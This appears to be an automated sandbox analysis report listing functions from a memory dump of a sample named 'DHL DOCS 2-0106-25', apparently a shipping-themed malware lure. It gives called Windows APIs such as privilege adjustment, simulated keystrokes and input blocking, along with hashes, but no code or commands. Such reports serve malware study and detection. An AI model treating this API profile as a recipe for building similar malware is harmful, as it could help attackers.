Instruction Fuzzy Hash: ECE0BF35001548ABCF616F54ED0DA583F6AEB56741B144055FC198B222CB35DD41CA40

Function 0020D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0020D28C

Strings

X64, xrefs: 0020D2A8

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 7a36532c2d3feb4d31230de9e097260555bb44087e961bcfd008ff5a111b7fde
Instruction ID: de46422c3a33dccf8e414d6d7ad673ba10ba5be99bb311ba423d4327293358d5
Opcode Fuzzy Hash: 7a36532c2d3feb4d31230de9e097260555bb44087e961bcfd008ff5a111b7fde
Instruction Fuzzy Hash: 05D0C9B481211DEFCB94CB94EC88DDAB37CBB14305F100165F506A2040DB7095488F10

Function 001DCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 81fdda32b4bc4e32412c3a366d2050238eb4cbd970f4ec2c775f37a319157cea
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: A9021D71E0011A9BDF14CFA9C9806ADFBF1EF48314F25466AD919E7384D731AA41CBD4

Function 001BCAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

p#(, xrefs: 001BCF7F
Variable is not of type 'Object'., xrefs: 00200C40

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#(
API String ID: 0-1684414423
Opcode ID: 5d3f2cef48f289987056e9edab48dd56024d93181da2d0b556c2ae5d89eb43b9
Instruction ID: 823e207f94015cd58eae6dc045433ce06d6b330f59351045387e33cb6dd79d34
Opcode Fuzzy Hash: 5d3f2cef48f289987056e9edab48dd56024d93181da2d0b556c2ae5d89eb43b9
Instruction Fuzzy Hash: AD329B74910219DBDF14DF94C881BFDBBB5FF25304F248069E806AB292DB75AE45CBA0

Function 002268EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00226918
FindClose.KERNEL32(00000000), ref: 00226961

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 29818225bef282cbe8a1f34c859438387b82b00c7de92e68123462c70be91aa9
Instruction ID: 290e8728b4dbf757ef65aca68fb78fda6e27959999d9478d6a7524f37e5618f8
Opcode Fuzzy Hash: 29818225bef282cbe8a1f34c859438387b82b00c7de92e68123462c70be91aa9
Instruction Fuzzy Hash: 0911D3356142119FC710CF69D488A16BBE0FF85328F14C69DF4698F6A2CB70EC45CB90

Function 002237B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00234891,?,?,00000035,?), ref: 002237E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00234891,?,?,00000035,?), ref: 002237F4

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: cd91fd96a6cd841ea502aa2aff3a84ee1473c4bf206ab7c548dfeb0a72d54f56
Instruction ID: dab22ce2b5d6e488613410d623c473d1fc8e8fac125f3b400f11657af674ced1
Opcode Fuzzy Hash: cd91fd96a6cd841ea502aa2aff3a84ee1473c4bf206ab7c548dfeb0a72d54f56
Instruction Fuzzy Hash: 6CF05C706052283BDB1057A55C4CFEB7A9DDFC5760F000161F504D2180C6A04904C6B0

Function 0021B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0021B25D
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0021B270

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: cd95b8ad423fe8100ffcce46442b240f44c3034774946eed1508e91f516b5b14
Instruction ID: a08d0e84afac9b240520838a569f66b5e09f8fb70a3d7a006e57e42300be3b9f
Opcode Fuzzy Hash: cd95b8ad423fe8100ffcce46442b240f44c3034774946eed1508e91f516b5b14
Instruction Fuzzy Hash: ACF06D7481424EABDB058FA4C805BEE7BB4FF04305F108009F951A5191C3798615DF94

Function 002110BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002111FC), ref: 002110D4
CloseHandle.KERNEL32(?,?,002111FC), ref: 002110E9

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: da0e59aa6a58d5d10ab99b5f74863dc14b5aa0dead427d5fa293b8273326b08c
Instruction ID: 93f6c05357823728323baf618ac9a60f1fee3d108909f26ec3744d741dafef03
Opcode Fuzzy Hash: da0e59aa6a58d5d10ab99b5f74863dc14b5aa0dead427d5fa293b8273326b08c
Instruction Fuzzy Hash: 82E04F32019610AEE7252F55FC09FB37BE9EB14310B20882DF5A6804B1DB62ACA0DB10

Function 001E676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001E6766,?,?,00000008,?,?,001EFEFE,00000000), ref: 001E6998

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 93d6f771f18ff11b9f7e5f388df3702990b82276d49360ce6f3bddad0831d225
Instruction ID: 1112f54370c748fa1c8c7418dcd07d2cf183da48c33dba3363217305c20c8e23
Opcode Fuzzy Hash: 93d6f771f18ff11b9f7e5f388df3702990b82276d49360ce6f3bddad0831d225
Instruction Fuzzy Hash: 5CB17E31510A48CFD719CF29C486B687BE0FF553A4F658658E8D9CF2A2C335E981CB40

Function 001CB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0020851F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: d8c262a7e972a335c41c86664688f32285f0dcb23626f64e824867ae8cef0860
Instruction ID: a09c3ab71744b3014b54fe97b35206ced81558959729a885884276d0ebc09d3c
Opcode Fuzzy Hash: d8c262a7e972a335c41c86664688f32285f0dcb23626f64e824867ae8cef0860
Instruction Fuzzy Hash: 6A1250719142299FCB14CF58C881BEEB7B5FF58710F15819AE849EB292DB309E91CF90

Function 0022EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0022EABD

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: a393a9644a83971c52c7aa919bfd82ea4000715b3c86ce92b845267f83ad93e7
Instruction ID: dfdb6aa8ad6001f5117cb4256d0c3fb211ac963c19a1df144646fed792c88271
Opcode Fuzzy Hash: a393a9644a83971c52c7aa919bfd82ea4000715b3c86ce92b845267f83ad93e7
Instruction Fuzzy Hash: B6E04F35210214AFC710EF9DE844E9AF7EDAFA9760F01841AFC4AC7351DBB0E8408B91

Function 001D09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001D03EE), ref: 001D09DA

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7a43e604b5a04612e6e7023e665d1cd7bcd8b31bb061619741fbccead62e9766
Instruction ID: 93b80bd4de672b8d4c5f833dc4ec2f51b7c5d8a9db2bfc57b51b1d79b920b70c
Opcode Fuzzy Hash: 7a43e604b5a04612e6e7023e665d1cd7bcd8b31bb061619741fbccead62e9766
Instruction Fuzzy Hash:

Function 001D781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 001D798B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 4177a0bea3327ce5e565ffd9c761053d5aa853b50c4882918298bb0f35e3bdca
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: BD51667260C7459BDF3C856C886EBBE63999B12358F18050BE886D73C2FB15EE01E356

Function 00222046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&(, xrefs: 00222053

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID: 0&(
API String ID: 0-759240540
Opcode ID: 336a555eb7aeb5686c257b17a49e49b2f643313d5193deeb6ed40f65f3ae7f05
Instruction ID: bfac38593ffedafeb2c8b4f7c8691a50431866334e5eefaa948ef22cf078c6b5
Opcode Fuzzy Hash: 336a555eb7aeb5686c257b17a49e49b2f643313d5193deeb6ed40f65f3ae7f05
Instruction Fuzzy Hash: 2321BB32621521DBD728CF79D81767E73E5A764310F15862EE4A7C77D0DE36A908CB40

Function 001E6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5431af5924abe4801f82265932de682939774411084bbf891fa700711822f0b
Instruction ID: 44947fb829bb70f29bb08e87841e02f6b338f8b1225f732679c2e76a98a17d18
Opcode Fuzzy Hash: f5431af5924abe4801f82265932de682939774411084bbf891fa700711822f0b
Instruction Fuzzy Hash: 06324522D29F814DE7239635DC26339A259AFB73C6F15C737E81AB59E5EB39C4834100

Function 001CCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bac092c7bd4a447726f27e58cbe7ebd35fb6d68b9bb76f1cc6776af271b649d
Instruction ID: 0be1fd45a0e2a5d9720db40e556e71ca7839d613fadff7db48c387998b26d2a6
Opcode Fuzzy Hash: 6bac092c7bd4a447726f27e58cbe7ebd35fb6d68b9bb76f1cc6776af271b649d
Instruction Fuzzy Hash: 7132D1B1A242168BDF28CF29C494B7D77A1EB45314F38866AD85ACB2D3D330DDA1DB41

Function 001B7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4472dcadcac9b1af494d3103bc4e1755130da082a39ab87f5b0915de6d6e097d
Instruction ID: 37bdd381de4d2889b2520d36ce881dacca6485728b54df066711cd8ad17bbbcb
Opcode Fuzzy Hash: 4472dcadcac9b1af494d3103bc4e1755130da082a39ab87f5b0915de6d6e097d
Instruction Fuzzy Hash: 1022C070A0460ADFDF14CF64D981AFEB7F2FF54300F244529E916AB291EB369951CB50

Function 001B91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4c3846a30555ecf4f6475db16fb1b1e6240d9e9e9b82bcd135684b451907af3
Instruction ID: 6d34e5de90774f37e13c1e4601aa512e93d86180c85304298d17039255bbbb86
Opcode Fuzzy Hash: e4c3846a30555ecf4f6475db16fb1b1e6240d9e9e9b82bcd135684b451907af3
Instruction Fuzzy Hash: 440295B0E00209EBDB14DF64D881ABDB7F1FF54300F518169E91ADB2A1E731EA61CB91

Function 001D1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: c48789963009d7ab4b74ea28fc5caf0bf15c9e833e1b7f666499701d7ae29b57
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 8A9158736080A379DB2E467D857407EFFE25A923A131A079FD4F2CA2C5FF249554D620

Function 001D19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 1b1939d33b7aed7b7307c01e4e8a709c6a6c59239a58c82db4313c4bd6facbca
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 2E9120722090E36ADB2D467A857407EFFF15A923A231A079FD4F2CB2C5FF249564D620

Function 001D7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33da8e8d9ff18e2f1d0cccbcac7d6a67fae02e4f70867977fbf0f94094144d14
Instruction ID: 6562b2544c9fa858bca21a3c576b4970dbb35d534fcc406b058c4a7acae647f8
Opcode Fuzzy Hash: 33da8e8d9ff18e2f1d0cccbcac7d6a67fae02e4f70867977fbf0f94094144d14
Instruction Fuzzy Hash: 9061397160870A9ADE38AA2C8DA6BBF6394DF51704F18091FE842DB3C1F715DE42C355

Function 001D7CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8c109758b1f10ef58e77139d2ec30a3c57fa28db505fdff3df747e48051faeb
Instruction ID: bcf4b77f3d77ae32bcb001acc8d217d44d2335bef09b3d71ac73f8fc2a4781d9
Opcode Fuzzy Hash: b8c109758b1f10ef58e77139d2ec30a3c57fa28db505fdff3df747e48051faeb
Instruction Fuzzy Hash: 59617931208F0967DE395AA89896BBF639AEF52744F10095BE843DB3C1FB12ED42C355

Function 001D1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

